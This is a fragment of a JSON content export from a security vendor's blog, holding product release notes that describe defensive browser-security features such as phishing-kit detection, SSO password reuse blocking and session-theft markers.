",{"data":188929,"marks":188930,"value":2718,"nodeType":173},{},[188931],{"type":370},{"data":188933,"marks":188934,"value":188935,"nodeType":173},{},[]," page in the Push admin console. It shows a rolling ",{"data":188937,"marks":188938,"value":188940,"nodeType":173},{},[188939],{"type":370},"7-day snapshot of all the events in your environment",{"data":188942,"marks":188943,"value":188944,"nodeType":173},{},[],", including security controls being activated, new apps being discovered, and more.",{"data":188946,"content":188947,"nodeType":178},{},[188948,188952,188957],{"data":188949,"marks":188950,"value":188951,"nodeType":173},{},[],"Click on an event to see its attributes and then ingest this data into your SIEM or other platform to create your own ",{"data":188953,"marks":188954,"value":188956,"nodeType":173},{},[188955],{"type":370},"custom detections or automations",{"data":188958,"marks":188959,"value":1477,"nodeType":173},{},[],{"data":188961,"content":188964,"nodeType":312},{"target":188962},{"sys":188963},{"id":183997,"type":317,"linkType":318},[],{"data":188966,"content":188967,"nodeType":178},{},[188968,188971,188979],{"data":188969,"marks":188970,"value":37,"nodeType":173},{},[],{"data":188972,"content":188975,"nodeType":1698},{"target":188973},{"sys":188974},{"id":183305,"type":317,"linkType":318},[188976],{"data":188977,"marks":188978,"value":18605,"nodeType":173},{},[],{"data":188980,"marks":188981,"value":37,"nodeType":173},{},[],{"data":188983,"content":188984,"nodeType":235},{},[188985],{"data":188986,"marks":188987,"value":188988,"nodeType":173},{},[],"Push now supports Arc browser",{"data":188990,"content":188991,"nodeType":178},{},[188992,188996,189001,189005,189014],{"data":188993,"marks":188994,"value":188995,"nodeType":173},{},[],"In keeping with our philosophy of securing users wherever they like to work, we’ve added support for the ",{"data":188997,"marks":188998,"value":189000,"nodeType":173},{},[188999],{"type":370},"increasingly popular Arc browser",{"data":189002,"marks":189003,"value":189004,"nodeType":173},{},[],". You can now install the Push browser agent on Arc, and do a managed deployment to Arc on macOS using your MDM. (Push already supports all major browsers. You can find the list in our ",{"data":189006,"content":189010,"nodeType":1698},{"target":189007},{"sys":189008},{"id":189009,"type":317,"linkType":318},"2grGlYU1UQns5CKgLtGUMk",[189011],{"data":189012,"marks":189013,"value":3262,"nodeType":173},{},[],{"data":189015,"marks":189016,"value":61717,"nodeType":173},{},[],{"data":189018,"content":189019,"nodeType":178},{},[189020],{"data":189021,"marks":189022,"value":189023,"nodeType":173},{},[],"Are there other browsers you’d like Push to support? Let us know!",{"data":189025,"content":189026,"nodeType":178},{},[189027,189030,189040],{"data":189028,"marks":189029,"value":37,"nodeType":173},{},[],{"data":189031,"content":189035,"nodeType":1698},{"target":189032},{"sys":189033},{"id":189034,"type":317,"linkType":318},"6U8oU6ximN4fg27xrs3StI",[189036],{"data":189037,"marks":189038,"value":189039,"nodeType":173},{},[],"MDM documentation",{"data":189041,"marks":189042,"value":37,"nodeType":173},{},[],{"data":189044,"content":189045,"nodeType":235},{},[189046],{"data":189047,"marks":189048,"value":189049,"nodeType":173},{},[],"Warn or block users when Push detects phishing toolkits",{"data":189051,"content":189052,"nodeType":178},{},[189053,189057,189061,189064,189068,189072,189076,189080,189085],{"data":189054,"marks":189055,"value":189056,"nodeType":173},{},[],"You can now set a ",{"data":189058,"marks":189059,"value":2740,"nodeType":173},{},[189060],{"type":370},{"data":189062,"marks":189063,"value":1464,"nodeType":173},{},[],{"data":189065,"marks":189066,"value":2748,"nodeType":173},{},[189067],{"type":370},{"data":189069,"marks":189070,"value":189071,"nodeType":173},{},[]," mode on Push’s ",{"data":189073,"marks":189074,"value":121096,"nodeType":173},{},[189075],{"type":370},{"data":189077,"marks":189078,"value":189079,"nodeType":173},{},[]," feature. Phishing toolkit detection identifies when employees visit webpages that use advanced phishing tools such as Evilginx, EvilNoVNC, and others. These adversary-in-the-middle (AitM) tools can mimic legitimate login screens, such as an Okta login page, to ",{"data":189081,"marks":189082,"value":189084,"nodeType":173},{},[189083],{"type":370},"steal credentials and MFA codes",{"data":189086,"marks":189087,"value":1477,"nodeType":173},{},[],{"data":189089,"content":189090,"nodeType":178},{},[189091],{"data":189092,"marks":189093,"value":189094,"nodeType":173},{},[],"When you configure a Warn or Block mode for this control, you can add your custom message to end-users on the warn/block page. Then get alerted to positive detections using Push’s webhook events.",{"data":189096,"content":189100,"nodeType":312},{"target":189097},{"sys":189098},{"id":189099,"type":317,"linkType":318},"1LdHJjTDlOiie5mctbAVvZ",[],{"data":189102,"content":189103,"nodeType":178},{},[189104,189107,189116],{"data":189105,"marks":189106,"value":37,"nodeType":173},{},[],{"data":189108,"content":189111,"nodeType":1698},{"target":189109},{"sys":189110},{"id":114387,"type":317,"linkType":318},[189112],{"data":189113,"marks":189114,"value":189115,"nodeType":173},{},[],"How it works",{"data":189117,"marks":189118,"value":37,"nodeType":173},{},[],{"data":189120,"content":189121,"nodeType":235},{},[189122],{"data":189123,"marks":189124,"value":189125,"nodeType":173},{},[],"Stay on top of admin actions",{"data":189127,"content":189128,"nodeType":178},{},[189129,189133,189138],{"data":189130,"marks":189131,"value":189132,"nodeType":173},{},[],"We recently added ",{"data":189134,"marks":189135,"value":189137,"nodeType":173},{},[189136],{"type":370},"events for administrative actions",{"data":189139,"marks":189140,"value":189141,"nodeType":173},{},[]," on the Push platform, so you can get visibility when admins assign or remove licenses, configure security controls, or add or remove API keys, among other actions. ",{"data":189143,"content":189144,"nodeType":178},{},[189145,189149,189153],{"data":189146,"marks":189147,"value":189148,"nodeType":173},{},[],"You’ll see admin events show up on the ",{"data":189150,"marks":189151,"value":2718,"nodeType":173},{},[189152],{"type":370},{"data":189154,"marks":189155,"value":189156,"nodeType":173},{},[]," page in the admin console. Send these events to your SIEM or other system to create custom alerts.",{"data":189158,"content":189162,"nodeType":312},{"target":189159},{"sys":189160},{"id":189161,"type":317,"linkType":318},"1qZHyxVEVFQs16kcIiufRm",[],{"data":189164,"content":189165,"nodeType":178},{},[189166,189169,189177],{"data":189167,"marks":189168,"value":37,"nodeType":173},{},[],{"data":189170,"content":189172,"nodeType":186},{"uri":189171},"https://pushsecurity.redoc.ly/webhooks-v1#tag/Audit",[189173],{"data":189174,"marks":189175,"value":189176,"nodeType":173},{},[],"See list of admin events",{"data":189178,"marks":189179,"value":37,"nodeType":173},{},[],{"data":189181,"content":189182,"nodeType":235},{},[189183],{"data":189184,"marks":189185,"value":189186,"nodeType":173},{},[],"Custom labels to organize your app inventory",{"data":189188,"content":189189,"nodeType":178},{},[189190,189194,189199],{"data":189191,"marks":189192,"value":189193,"nodeType":173},{},[],"Create your own custom labels and apply them to apps in your inventory using our new ",{"data":189195,"marks":189196,"value":189198,"nodeType":173},{},[189197],{"type":370},"Labels",{"data":189200,"marks":189201,"value":189202,"nodeType":173},{},[]," feature. This feature has been a popular request from customers, and we’re excited to get it into your hands. ",{"data":189204,"content":189205,"nodeType":178},{},[189206,189210,189215,189218,189223,189226,189231],{"data":189207,"marks":189208,"value":189209,"nodeType":173},{},[],"A few ideas on how you might want to use app labels: To designate what kind of data is stored in an app; to note the ",{"data":189211,"marks":189212,"value":189214,"nodeType":173},{},[189213],{"type":370},"confidentiality",{"data":189216,"marks":189217,"value":2936,"nodeType":173},{},[],{"data":189219,"marks":189220,"value":189222,"nodeType":173},{},[189221],{"type":370},"integrity",{"data":189224,"marks":189225,"value":9534,"nodeType":173},{},[],{"data":189227,"marks":189228,"value":189230,"nodeType":173},{},[189229],{"type":370},"availability status",{"data":189232,"marks":189233,"value":189234,"nodeType":173},{},[]," of an app; to capture whether an app is IT-managed, or anything else you can think of!",{"data":189236,"content":189239,"nodeType":312},{"target":189237},{"sys":189238},{"id":156868,"type":317,"linkType":318},[],{"data":189241,"content":189242,"nodeType":178},{},[189243,189246,189255],{"data":189244,"marks":189245,"value":37,"nodeType":173},{},[],{"data":189247,"content":189251,"nodeType":1698},{"target":189248},{"sys":189249},{"id":189250,"type":317,"linkType":318},"6vxd2k7cGU7ToDGI7goaur",[189252],{"data":189253,"marks":189254,"value":18605,"nodeType":173},{},[],{"data":189256,"marks":189257,"value":37,"nodeType":173},{},[],{"data":189259,"content":189260,"nodeType":235},{},[189261],{"data":189262,"marks":189263,"value":189264,"nodeType":173},{},[],"Redesigned Browsers page",{"data":189266,"content":189267,"nodeType":178},{},[189268,189272,189276,189280,189285],{"data":189269,"marks":189270,"value":189271,"nodeType":173},{},[],"We’ve updated the ",{"data":189273,"marks":189274,"value":65381,"nodeType":173},{},[189275],{"type":370},{"data":189277,"marks":189278,"value":189279,"nodeType":173},{},[]," page in the admin console to make it possible to ",{"data":189281,"marks":189282,"value":189284,"nodeType":173},{},[189283],{"type":370},"filter and export the data",{"data":189286,"marks":189287,"value":189288,"nodeType":173},{},[],", as well as to help you better extract useful information about enrolled browsers, such as their extension version, first and last check-in dates, and browser types.",{"data":189290,"content":189291,"nodeType":178},{},[189292,189296,189300],{"data":189293,"marks":189294,"value":189295,"nodeType":173},{},[],"This page also now appears as a data table, similar to the other pages in the ",{"data":189297,"marks":189298,"value":18547,"nodeType":173},{},[189299],{"type":370},{"data":189301,"marks":189302,"value":189303,"nodeType":173},{},[]," section of the platform.",{"data":189305,"content":189309,"nodeType":312},{"target":189306},{"sys":189307},{"id":189308,"type":317,"linkType":318},"7yuZTKsdMSEIxK1RYtGNa",[],{"data":189311,"content":189312,"nodeType":178},{},[189313],{"data":189314,"marks":189315,"value":37,"nodeType":173},{},[],"Product release: July 2024","Here’s what’s new on the Push platform for July 2024.","2024-07-16T00:00:00.000Z","product-release-july-2024",{"items":189321},[189322,189324],{"sys":189323,"name":26137},{"id":26136},{"sys":189325,"name":18399},{"id":18398},{"items":189327},[189328],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":189329},{"url":19129},{"__typename":1528,"sys":189331,"content":189333,"title":189751,"synopsis":189752,"hashTags":118,"publishedDate":189753,"slug":189754,"tagsCollection":189755,"authorsCollection":189759},{"id":189332},"liumWpzvwXGmwbtKrvJdO",{"json":189334},{"data":189335,"content":189336,"nodeType":165},{},[189337,189343,189402,189409,189425,189439,189446,189451,189469,189476,189491,189498,189504,189521,189528,189553,189568,189585,189592,189607,189623,189629,189646,189653,189677,189683,189700,189707,189736],{"data":189338,"content":189339,"nodeType":235},{},[189340],{"data":189341,"marks":189342,"value":65066,"nodeType":173},{},[],{"data":189344,"content":189345,"nodeType":250},{},[189346,189355,189364,189373,189382,189392],{"data":189347,"content":189348,"nodeType":254},{},[189349],{"data":189350,"content":189351,"nodeType":178},{},[189352],{"data":189353,"marks":189354,"value":125683,"nodeType":173},{},[],{"data":189356,"content":189357,"nodeType":254},{},[189358],{"data":189359,"content":189360,"nodeType":178},{},[189361],{"data":189362,"marks":189363,"value":24345,"nodeType":173},{},[],{"data":189365,"content":189366,"nodeType":254},{},[189367],{"data":189368,"content":189369,"nodeType":178},{},[189370],{"data":189371,"marks":189372,"value":183755,"nodeType":173},{},[],{"data":189374,"content":189375,"nodeType":254},{},[189376],{"data":189377,"content":189378,"nodeType":178},{},[189379],{"data":189380,"marks":189381,"value":157048,"nodeType":173},{},[],{"data":189383,"content":189384,"nodeType":254},{},[189385],{"data":189386,"content":189387,"nodeType":178},{},[189388],{"data":189389,"marks":189390,"value":189391,"nodeType":173},{},[],"Require a reason for app usage",{"data":189393,"content":189394,"nodeType":254},{},[189395],{"data":189396,"content":189397,"nodeType":178},{},[189398],{"data":189399,"marks":189400,"value":189401,"nodeType":173},{},[],"Expanded API and webhooks options",{"data":189403,"content":189404,"nodeType":235},{},[189405],{"data":189406,"marks":189407,"value":189408,"nodeType":173},{},[],"Prevent SSO password reuse",{"data":189410,"content":189411,"nodeType":178},{},[189412,189416,189421],{"data":189413,"marks":189414,"value":189415,"nodeType":173},{},[],"Instead of trying to detect phishing websites and domains that constantly change, Push can now ",{"data":189417,"marks":189418,"value":189420,"nodeType":173},{},[189419],{"type":370},"detect (and block!) SSO password reuse",{"data":189422,"marks":189423,"value":189424,"nodeType":173},{},[]," based on directly observing user behavior in the browser.",{"data":189426,"content":189427,"nodeType":178},{},[189428,189431,189435],{"data":189429,"marks":189430,"value":67566,"nodeType":173},{},[],{"data":189432,"marks":189433,"value":125683,"nodeType":173},{},[189434],{"type":370},{"data":189436,"marks":189437,"value":189438,"nodeType":173},{},[]," feature detects and blocks when a user enters their identity provider password on a webpage that does not belong to the IdP (e.g. Okta, Google Workspace, Microsoft 365, etc.)",{"data":189440,"content":189441,"nodeType":178},{},[189442],{"data":189443,"marks":189444,"value":189445,"nodeType":173},{},[],"You can choose to warn or block SSO password reuse and customize the message that end-users see.",{"data":189447,"content":189450,"nodeType":312},{"target":189448},{"sys":189449},{"id":24862,"type":317,"linkType":318},[],{"data":189452,"content":189453,"nodeType":178},{},[189454,189457,189466],{"data":189455,"marks":189456,"value":37,"nodeType":173},{},[],{"data":189458,"content":189462,"nodeType":1698},{"target":189459},{"sys":189460},{"id":189461,"type":317,"linkType":318},"4UtRVoFElDduWJBx9Sa4Cw",[189463],{"data":189464,"marks":189465,"value":148770,"nodeType":173},{},[],{"data":189467,"marks":189468,"value":37,"nodeType":173},{},[],{"data":189470,"content":189471,"nodeType":235},{},[189472],{"data":189473,"marks":189474,"value":189475,"nodeType":173},{},[],"Detect Adversary-in-the-Middle phishing toolkits",{"data":189477,"content":189478,"nodeType":178},{},[189479,189482,189487],{"data":189480,"marks":189481,"value":167538,"nodeType":173},{},[],{"data":189483,"marks":189484,"value":189486,"nodeType":173},{},[189485],{"type":370},"detect when employees visit websites that are using phishing toolkits",{"data":189488,"marks":189489,"value":189490,"nodeType":173},{},[]," such as EvilNoVNC and Evilginx. These tools can mimic legitimate login screens in order to steal credentials and bypass MFA.",{"data":189492,"content":189493,"nodeType":178},{},[189494],{"data":189495,"marks":189496,"value":189497,"nodeType":173},{},[],"Send detections to your SIEM or similar monitoring tool and add malicious sites to a blocklist in Push.",{"data":189499,"content":189503,"nodeType":312},{"target":189500},{"sys":189501},{"id":189502,"type":317,"linkType":318},"450I6V31ET3EbfgMiVBPBR",[],{"data":189505,"content":189506,"nodeType":178},{},[189507,189510,189518],{"data":189508,"marks":189509,"value":37,"nodeType":173},{},[],{"data":189511,"content":189514,"nodeType":1698},{"target":189512},{"sys":189513},{"id":2148,"type":317,"linkType":318},[189515],{"data":189516,"marks":189517,"value":18605,"nodeType":173},{},[],{"data":189519,"marks":189520,"value":37,"nodeType":173},{},[],{"data":189522,"content":189523,"nodeType":235},{},[189524],{"data":189525,"marks":189526,"value":189527,"nodeType":173},{},[],"Identify session token theft ",{"data":189529,"content":189530,"nodeType":178},{},[189531,189535,189540,189544,189549],{"data":189532,"marks":189533,"value":189534,"nodeType":173},{},[],"You can now use the Push browser agent to ",{"data":189536,"marks":189537,"value":189539,"nodeType":173},{},[189538],{"type":370},"inject a unique marker to the user agent string",{"data":189541,"marks":189542,"value":189543,"nodeType":173},{},[]," of sessions that occur in browsers enrolled in Push. By analyzing logs from your identity provider (e.g. Okta, Microsoft 365, etc.) or other app, you can use the marker to help you ",{"data":189545,"marks":189546,"value":189548,"nodeType":173},{},[189547],{"type":370},"find suspicious activity that indicates a stolen session cookie",{"data":189550,"marks":189551,"value":189552,"nodeType":173},{},[]," in use.",{"data":189554,"content":189555,"nodeType":178},{},[189556,189560,189565],{"data":189557,"marks":189558,"value":189559,"nodeType":173},{},[],"Detecting session hijacking is extremely difficult when relying on device-based monitoring using EDR and network traffic. But by giving legitimate sessions a stamp of approval using the Push browser agent, you can easily ",{"data":189561,"marks":189562,"value":189564,"nodeType":173},{},[189563],{"type":370},"identify access to apps from untrusted devices",{"data":189566,"marks":189567,"value":1477,"nodeType":173},{},[],{"data":189569,"content":189570,"nodeType":178},{},[189571,189574,189582],{"data":189572,"marks":189573,"value":37,"nodeType":173},{},[],{"data":189575,"content":189578,"nodeType":1698},{"target":189576},{"sys":189577},{"id":114256,"type":317,"linkType":318},[189579],{"data":189580,"marks":189581,"value":148770,"nodeType":173},{},[],{"data":189583,"marks":189584,"value":37,"nodeType":173},{},[],{"data":189586,"content":189587,"nodeType":235},{},[189588],{"data":189589,"marks":189590,"value":189591,"nodeType":173},{},[],"Configure a custom blocklist of URLs",{"data":189593,"content":189594,"nodeType":178},{},[189595,189599,189603],{"data":189596,"marks":189597,"value":189598,"nodeType":173},{},[],"Prevent employees from visiting malicious sites you detect by configuring a custom blocklist of URLs in Push using the ",{"data":189600,"marks":189601,"value":157048,"nodeType":173},{},[189602],{"type":370},{"data":189604,"marks":189605,"value":189606,"nodeType":173},{},[]," feature. You can customize the message shown to end-users by adding your own links and instructions. Use Push’s REST API to programmatically manage URL blocking as part of responding to a phishing incident.",{"data":189608,"content":189609,"nodeType":178},{},[189610,189614,189619],{"data":189611,"marks":189612,"value":189613,"nodeType":173},{},[],"You can use this alongside other Push features like phishing tool detection to ",{"data":189615,"marks":189616,"value":189618,"nodeType":173},{},[189617],{"type":370},"block access to known-bad sites",{"data":189620,"marks":189621,"value":189622,"nodeType":173},{},[]," you find. ",{"data":189624,"content":189628,"nodeType":312},{"target":189625},{"sys":189626},{"id":189627,"type":317,"linkType":318},"1S7cuS7qo5jTcEg7RPPZu6",[],{"data":189630,"content":189631,"nodeType":178},{},[189632,189635,189643],{"data":189633,"marks":189634,"value":37,"nodeType":173},{},[],{"data":189636,"content":189639,"nodeType":1698},{"target":189637},{"sys":189638},{"id":183743,"type":317,"linkType":318},[189640],{"data":189641,"marks":189642,"value":18605,"nodeType":173},{},[],{"data":189644,"marks":189645,"value":37,"nodeType":173},{},[],{"data":189647,"content":189648,"nodeType":235},{},[189649],{"data":189650,"marks":189651,"value":189652,"nodeType":173},{},[],"Require end-users to submit a reason when using an app",{"data":189654,"content":189655,"nodeType":178},{},[189656,189660,189664,189668,189673],{"data":189657,"marks":189658,"value":189659,"nodeType":173},{},[],"We’ve expanded our popular app banners feature to include a ",{"data":189661,"marks":189662,"value":157095,"nodeType":173},{},[189663],{"type":370},{"data":189665,"marks":189666,"value":189667,"nodeType":173},{},[]," mode that allows you to configure a custom message and require employees to submit a reason ",{"data":189669,"marks":189670,"value":189672,"nodeType":173},{},[189671],{"type":370},"why they need to use a specific app",{"data":189674,"marks":189675,"value":189676,"nodeType":173},{},[]," before they can proceed to log in.",{"data":189678,"content":189682,"nodeType":312},{"target":189679},{"sys":189680},{"id":189681,"type":317,"linkType":318},"6Q7kU16LZdTm8RsyLy660J",[],{"data":189684,"content":189685,"nodeType":178},{},[189686,189689,189697],{"data":189687,"marks":189688,"value":37,"nodeType":173},{},[],{"data":189690,"content":189693,"nodeType":1698},{"target":189691},{"sys":189692},{"id":2466,"type":317,"linkType":318},[189694],{"data":189695,"marks":189696,"value":18605,"nodeType":173},{},[],{"data":189698,"marks":189699,"value":37,"nodeType":173},{},[],{"data":189701,"content":189702,"nodeType":235},{},[189703],{"data":189704,"marks":189705,"value":189706,"nodeType":173},{},[],"Monitor ‘other apps’ list via Push API and webhooks",{"data":189708,"content":189709,"nodeType":178},{},[189710,189714,189719,189723,189732],{"data":189711,"marks":189712,"value":189713,"nodeType":173},{},[],"You can now keep a closer eye on ",{"data":189715,"marks":189716,"value":189718,"nodeType":173},{},[189717],{"type":370},"all new observed cloud apps",{"data":189720,"marks":189721,"value":189722,"nodeType":173},{},[]," by using the Push API and webhooks to notify you of new entries on the ",{"data":189724,"content":189727,"nodeType":1698},{"target":189725},{"sys":189726},{"id":148863,"type":317,"linkType":318},[189728],{"data":189729,"marks":189730,"value":189731,"nodeType":173},{},[],"“other apps” list",{"data":189733,"marks":189734,"value":189735,"nodeType":173},{},[]," or to retrieve specific details about accounts on these apps. The “other apps” list consists of apps accessed by employees that Push doesn’t recognize as work apps but that may still be relevant to your operations. ",{"data":189737,"content":189738,"nodeType":178},{},[189739,189742,189748],{"data":189740,"marks":189741,"value":37,"nodeType":173},{},[],{"data":189743,"content":189744,"nodeType":186},{"uri":183466},[189745],{"data":189746,"marks":189747,"value":18605,"nodeType":173},{},[],{"data":189749,"marks":189750,"value":13836,"nodeType":173},{},[],"Product release: May 2024","Here’s what’s new on the Push platform for May 2024.","2024-05-22T00:00:00.000Z","product-release-may-2024",{"items":189756},[189757],{"sys":189758,"name":18399},{"id":18398},{"items":189760},[189761],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":189762},{"url":19129},{"items":189764},[189765],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":189766},{"url":19129},{"json":189768,"links":190026},{"data":189769,"content":189770,"nodeType":165},{},[189771,189777,189807,189813,189826,189839,189878,189883,189889,189906,189912,189925,189938,189943,189956,189973,189979,189992,189998,190004,190009],{"data":189772,"content":189773,"nodeType":169},{},[189774],{"data":189775,"marks":189776,"value":18415,"nodeType":173},{},[],{"data":189778,"content":189779,"nodeType":250},{},[189780,189789,189798],{"data":189781,"content":189782,"nodeType":254},{},[189783],{"data":189784,"content":189785,"nodeType":178},{},[189786],{"data":189787,"marks":189788,"value":167380,"nodeType":173},{},[],{"data":189790,"content":189791,"nodeType":254},{},[189792],{"data":189793,"content":189794,"nodeType":178},{},[189795],{"data":189796,"marks":189797,"value":167390,"nodeType":173},{},[],{"data":189799,"content":189800,"nodeType":254},{},[189801],{"data":189802,"content":189803,"nodeType":178},{},[189804],{"data":189805,"marks":189806,"value":167400,"nodeType":173},{},[],{"data":189808,"content":189809,"nodeType":169},{},[189810],{"data":189811,"marks":189812,"value":167380,"nodeType":173},{},[],{"data":189814,"content":189815,"nodeType":178},{},[189816,189819,189823],{"data":189817,"marks":189818,"value":167413,"nodeType":173},{},[],{"data":189820,"marks":189821,"value":167418,"nodeType":173},{},[189822],{"type":370},{"data":189824,"marks":189825,"value":156489,"nodeType":173},{},[],{"data":189827,"content":189828,"nodeType":178},{},[189829,189832,189836],{"data":189830,"marks":189831,"value":167428,"nodeType":173},{},[],{"data":189833,"marks":189834,"value":167418,"nodeType":173},{},[189835],{"type":370},{"data":189837,"marks":189838,"value":167436,"nodeType":173},{},[],{"data":189840,"content":189841,"nodeType":250},{},[189842,189851,189860,189869],{"data":189843,"content":189844,"nodeType":254},{},[189845],{"data":189846,"content":189847,"nodeType":178},{},[189848],{"data":189849,"marks":189850,"value":167449,"nodeType":173},{},[],{"data":189852,"content":189853,"nodeType":254},{},[189854],{"data":189855,"content":189856,"nodeType":178},{},[189857],{"data":189858,"marks":189859,"value":167459,"nodeType":173},{},[],{"data":189861,"content":189862,"nodeType":254},{},[189863],{"data":189864,"content":189865,"nodeType":178},{},[189866],{"data":189867,"marks":189868,"value":167469,"nodeType":173},{},[],{"data":189870,"content":189871,"nodeType":254},{},[189872],{"data":189873,"content":189874,"nodeType":178},{},[189875],{"data":189876,"marks":189877,"value":167479,"nodeType":173},{},[],{"data":189879,"content":189882,"nodeType":312},{"target":189880},{"sys":189881},{"id":167484,"type":317,"linkType":318},[],{"data":189884,"content":189885,"nodeType":178},{},[189886],{"data":189887,"marks":189888,"value":167492,"nodeType":173},{},[],{"data":189890,"content":189891,"nodeType":178},{},[189892,189895,189903],{"data":189893,"marks":189894,"value":37,"nodeType":173},{},[],{"data":189896,"content":189899,"nodeType":1698},{"target":189897},{"sys":189898},{"id":83443,"type":317,"linkType":318},[189900],{"data":189901,"marks":189902,"value":18605,"nodeType":173},{},[],{"data":189904,"marks":189905,"value":37,"nodeType":173},{},[],{"data":189907,"content":189908,"nodeType":169},{},[189909],{"data":189910,"marks":189911,"value":167390,"nodeType":173},{},[],{"data":189913,"content":189914,"nodeType":178},{},[189915,189918,189922],{"data":189916,"marks":189917,"value":167522,"nodeType":173},{},[],{"data":189919,"marks":189920,"value":167527,"nodeType":173},{},[189921],{"type":370},{"data":189923,"marks":189924,"value":167531,"nodeType":173},{},[],{"data":189926,"content":189927,"nodeType":178},{},[189928,189931,189935],{"data":189929,"marks":189930,"value":167538,"nodeType":173},{},[],{"data":189932,"marks":189933,"value":167543,"nodeType":173},{},[189934],{"type":370},{"data":189936,"marks":189937,"value":167547,"nodeType":173},{},[],{"data":189939,"content":189942,"nodeType":312},{"target":189940},{"sys":189941},{"id":167552,"type":317,"linkType":318},[],{"data":189944,"content":189945,"nodeType":178},{},[189946,189949,189953],{"data":189947,"marks":189948,"value":167560,"nodeType":173},{},[],{"data":189950,"marks":189951,"value":167565,"nodeType":173},{},[189952],{"type":370},{"data":189954,"marks":189955,"value":167569,"nodeType":173},{},[],{"data":189957,"content":189958,"nodeType":178},{},[189959,189962,189970],{"data":189960,"marks":189961,"value":37,"nodeType":173},{},[],{"data":189963,"content":189966,"nodeType":1698},{"target":189964},{"sys":189965},{"id":167580,"type":317,"linkType":318},[189967],{"data":189968,"marks":189969,"value":18605,"nodeType":173},{},[],{"data":189971,"marks":189972,"value":37,"nodeType":173},{},[],{"data":189974,"content":189975,"nodeType":169},{},[189976],{"data":189977,"marks":189978,"value":167400,"nodeType":173},{},[],{"data":189980,"content":189981,"nodeType":178},{},[189982,189985,189989],{"data":189983,"marks":189984,"value":65284,"nodeType":173},{},[],{"data":189986,"marks":189987,"value":167604,"nodeType":173},{},[189988],{"type":370},{"data":189990,"marks":189991,"value":167608,"nodeType":173},{},[],{"data":189993,"content":189994,"nodeType":178},{},[189995],{"data":189996,"marks":189997,"value":167615,"nodeType":173},{},[],{"data":189999,"content":190000,"nodeType":178},{},[190001],{"data":190002,"marks":190003,"value":167622,"nodeType":173},{},[],{"data":190005,"content":190008,"nodeType":312},{"target":190006},{"sys":190007},{"id":167627,"type":317,"linkType":318},[],{"data":190010,"content":190011,"nodeType":178},{},[190012,190015,190023],{"data":190013,"marks":190014,"value":37,"nodeType":173},{},[],{"data":190016,"content":190019,"nodeType":1698},{"target":190017},{"sys":190018},{"id":167639,"type":317,"linkType":318},[190020],{"data":190021,"marks":190022,"value":18605,"nodeType":173},{},[],{"data":190024,"marks":190025,"value":37,"nodeType":173},{},[],{"entries":190027},{"inline":190028,"hyperlink":190029,"block":190042},[],[190030,190032,190037],{"sys":190031,"__typename":6655,"title":148494,"slug":148495,"articleId":148496},{"id":83443},{"sys":190033,"__typename":6655,"title":190034,"slug":190035,"articleId":190036},{"id":167580},"Can Push identify which password managers employees are using?","how-does-push-determine-if-an-employee-is-using-a-password-manager",10085,{"sys":190038,"__typename":6655,"title":190039,"slug":190040,"articleId":190041},{"id":167639},"How do I add employees to a group in Push?","how-do-i-add-employees-to-a-group-in-push",10122,[190043,190049,190055],{"sys":190044,"__typename":5345,"title":190045,"caption":118,"layoutMode":118,"file":190046},{"id":167484},"Control config rules - Rule editor slideout - KB 10125",{"url":190047,"width":121118,"height":190048},"https://images.ctfassets.net/y1cdw1ablpvd/5JtnRhF0ti8Ccz2jgotTf9/c0f1a797410d7807b44df56ad6b9bc67/config_rule_slideout_20241007.png",802,{"sys":190050,"__typename":5345,"title":190051,"caption":118,"layoutMode":118,"file":190052},{"id":167552},"Password manager ID slideout - KB 10085",{"url":190053,"width":107757,"height":190054},"https://images.ctfassets.net/y1cdw1ablpvd/2TXkTX9SUzHiK3zFkDgH1Q/ac7bd0cfaca45e46a8a511826e703af2/password_manager_id_slideout_20241106.png",1574,{"sys":190056,"__typename":5345,"title":190057,"caption":118,"layoutMode":118,"file":190058},{"id":167627},"Employee group slideout details - KB 10122",{"url":190059,"width":190060,"height":168031},"https://images.ctfassets.net/y1cdw1ablpvd/38AwxboHYYNRjclMmLVd8j/d0fc4391a1937d2875932875ac3b8982/employee_groups_slideout_20241007.png",701,"content:blog:product-release-november-2024.json","blog/product-release-november-2024.json","blog/product-release-november-2024",{"_path":190065,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":190066,"summary":190068,"title":46324,"subtitle":118,"metaTitle":190079,"synopsis":169048,"hashTags":118,"publishedDate":169049,"slug":46325,"ogImage":190080,"tagsCollection":190082,"relatedBlogPostsCollection":190088,"authorsCollection":191818,"content":191822,"_id":192194,"_type":5439,"_source":5440,"_file":192195,"_stem":192196,"_extension":5439},"/blog/stop-users-saving-corp-creds-into-personal-password-managers",{"id":24875,"publishedAt":190067},"2026-01-30T09:06:15.758Z",{"json":190069},{"data":190070,"content":190071,"nodeType":165},{},[190072],{"data":190073,"content":190074,"nodeType":178},{},[190075],{"data":190076,"marks":190077,"value":190078,"nodeType":173},{},[],"Using Push, you can now see which password managers your employees are storing their work credentials in. Make sure sensitive corporate credentials don’t leave your corporate environment and end up in personal password managers.","Stop users saving corp creds into personal password managers",{"url":190081},"https://images.ctfassets.net/y1cdw1ablpvd/6YBsnrEMlIe9XoTLr3cXJw/06246d9876bde6d6493e941d7a3932ed/image1.png",{"items":190083},[190084,190086],{"sys":190085,"name":18399},{"id":18398},{"sys":190087,"name":26137},{"id":26136},{"items":190089},[190090,190539,190825],{"__typename":1528,"sys":190091,"content":190092,"title":184620,"synopsis":184621,"hashTags":118,"publishedDate":184622,"slug":184623,"tagsCollection":190529,"authorsCollection":190535},{"id":184117},{"json":190093},{"nodeType":165,"data":190094,"content":190095},{},[190096,190122,190138,190144,190150,190153,190160,190166,190186,190192,190197,190203,190209,190239,190242,190249,190255,190271,190274,190281,190287,190293,190298,190314,190317,190324,190340,190346,190352,190368,190371,190378,190384,190390,190396,190399,190406,190412,190428,190434,190440,190446,190452,190458,190461,190468,190474,190513],{"nodeType":178,"data":190097,"content":190098},{},[190099,190102,190109,190112,190119],{"nodeType":173,"value":184126,"marks":190100,"data":190101},[],{},{"nodeType":186,"data":190103,"content":190104},{"uri":88239},[190105],{"nodeType":173,"value":88742,"marks":190106,"data":190108},[190107],{"type":194},{},{"nodeType":173,"value":184137,"marks":190110,"data":190111},[],{},{"nodeType":186,"data":190113,"content":190114},{"uri":74621},[190115],{"nodeType":173,"value":126005,"marks":190116,"data":190118},[190117],{"type":194},{},{"nodeType":173,"value":184148,"marks":190120,"data":190121},[],{},{"nodeType":178,"data":190123,"content":190124},{},[190125,190128,190135],{"nod